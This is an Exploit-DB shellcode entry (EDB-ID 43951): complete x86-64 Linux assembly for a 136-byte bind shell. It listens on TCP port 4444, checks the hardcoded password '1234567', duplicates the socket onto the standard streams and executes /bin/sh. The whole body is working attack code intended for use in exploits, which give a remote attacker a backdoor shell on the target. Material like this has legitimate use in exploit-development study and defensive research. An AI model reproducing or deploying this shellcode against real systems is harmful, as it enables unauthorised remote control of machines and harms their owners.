Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

EDB-ID:

43951

CVE:

N/A




Platform:

Linux_x86-64

Date:

2017-11-09


global _start

_start:

	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; SOCK_STREAM = 1
	; syscall number 41 

	push 41
	pop rax
	push 2
	pop rdi
	push 1
	pop rsi
	cdq
	syscall
	
	; copy socket descriptor to rdi for future use 

	xchg rdi,rax

	; server.sin_family = AF_INET 
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = INADDR_ANY
	; bzero(&server.sin_zero, 8)

	push rdx
	mov dx,0x5c11
	shl rdx,16
	xor dl,0x2
	push rdx

	; bind(sock, (struct sockaddr *)&server, sockaddr_len)
	; syscall number 49

	mov rsi, rsp
	mov al,49
	push 16
	pop rdx
	syscall

	; listen(sock, MAX_CLIENTS)
	; syscall number 50

	push 50
	pop rax
	push 2
	pop rsi
	syscall

	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
	; syscall number 43

	mov al,43
	sub rsp,16
	mov rsi,rsp
	push 16
	mov rdx,rsp
	syscall

	; close parent
	;push 3
	;pop rax
	;syscall

	; duplicate sockets

	; dup2 (new, old)
	xchg rdi,rax
	push 3
	pop rsi
dup2cycle:
	mov al, 33
	dec esi
	syscall
	loopnz dup2cycle

	; read passcode
	; xor rax,rax - already zeroed from prev cycle
	xor rdi,rdi
	push rax
	mov rsi,rsp
	push 8
	pop rdx
	syscall

	; Authentication with password "1234567"
	xchg rcx,rax
	mov rbx,0x0a37363534333231
	push rbx
	mov rdi,rsp
	repe cmpsb
	jnz wrong_pwd

	; execve stack-method

	push 59
	pop rax
	cdq ; extends rax sign into rdx, zeroing it out
	push rdx
	mov rbx,0x68732f6e69622f2f
	push rbx
	mov rdi,rsp
	push rdx
	mov rdx,rsp
	push rdi
	mov rsi,rsp
	syscall

wrong_pwd:
	nop